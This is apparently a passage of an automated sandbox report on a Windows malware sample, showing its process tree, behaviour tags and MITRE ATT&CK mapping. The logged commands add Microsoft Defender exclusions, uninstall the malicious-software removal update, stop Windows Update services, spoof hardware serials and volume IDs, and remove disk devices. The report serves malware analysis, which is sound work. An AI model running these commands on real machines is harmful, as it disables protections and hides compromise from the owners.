        
        PID:6540
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: 365I-F288
      4⤵
      PID:3036
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: 365I-F288
        5⤵
        
        PID:600
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: 22PM-2FMK
      4⤵
      PID:6792
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: 22PM-2FMK
        5⤵
        
        PID:6776
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: 30IM-L5HA
      4⤵
      PID:1456
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: 30IM-L5HA
        5⤵
        
        PID:2760
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: FEKT-LK5A
      4⤵
      PID:3900
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: FEKT-LK5A
        5⤵
        
        PID:1424
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: 8OTA-S5CM
      4⤵
      PID:4384
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: 8OTA-S5CM
        5⤵
        
        PID:804
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: FJOO-2SD4
      4⤵
      PID:1776
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: FJOO-2SD4
        5⤵
        
        PID:7140
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: BG1M-RM9K
      4⤵
      PID:4852
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: BG1M-RM9K
        5⤵
        
        PID:4148
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.cfg
      4⤵
      PID:2776
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.exe
      4⤵
      PID:1536
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.chm
      4⤵
      PID:1040
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amide.sys
      4⤵
      PID:216
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amifldrv64.sys
      4⤵
      PID:4728
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
      4⤵
      PID:4452
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\Disk.bat
      4⤵
      PID:4332
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\SerialC.bat
      4⤵
      PID:5820
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic diskdrive get serialnumber
        5⤵
        
        PID:1780
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic bios get serialnumber
        5⤵
        
        PID:5108
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic cpu get serialnumber
        5⤵
        
        PID:6988
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic baseboard get serialnumber
        5⤵
        
        PID:6204
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic baseboard get manufacturer
        5⤵
        
        PID:4540
    - - C:\Windows\system32\getmac.exe
        
        getmac
        5⤵
        
        PID:3488
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct
        5⤵
        
        PID:1096

C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""
1⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:1812

C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "D:\"
1⤵
PID:1416

C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SWD\WPDBUSENUM*" /use_wildcard""
1⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:3976

C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SCSI\Disk*" /use_wildcard""
1⤵
- Executes dropped EXE
- Maps connected drives based on registry
- Checks SCSI registry key(s)
PID:224

C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "STORAGE*" /use_wildcard""
1⤵
- Executes dropped EXE
PID:196

C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""
1⤵
PID:4488

C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "USBSTOR*" /use_wildcard""
1⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:3532

C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk&*" /use_wildcard""
1⤵
PID:3996

C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "disk"
1⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
PID:4004

C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk"
1⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:4640

C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "G:\"
1⤵
- Executes dropped EXE
PID:4960

C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "F:\"
1⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:3000

C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "E:\"
1⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:2800

C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "C:\"
1⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:1388

C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk drive*" /use_wildcard""
1⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:4364

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 86527HP-TRGT31039SG
1⤵
PID:6352

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
1⤵
PID:6636

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 56527HP-TRGT31039SL
1⤵
PID:5396

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 76530HP-TRGT9020MST
1⤵
PID:1656

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
1⤵
PID:5696

C:\ProgramData\VC_redist.x64.exe
C:\ProgramData\VC_redist.x64.exe
1⤵
PID:660
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  PID:4264
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:820
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:5788
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:6084
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:5188
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:5780
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:5536
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:6456
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  PID:2796
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  PID:5692
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:1368
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  PID:2768
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  PID:4324

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
1⤵
PID:6752

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 76563HP-TRGT18200MST
1⤵
PID:228

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
1⤵
PID:6084

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
1⤵
PID:5400

C:\ProgramData\VC_redist.x64.exe
C:\ProgramData\VC_redist.x64.exe
1⤵
PID:2880
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:4160
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:5512
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:6672
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:6728
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:1456
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:5784
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:7108
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  PID:4384
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  PID:2668
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  PID:6932
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  PID:6748

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery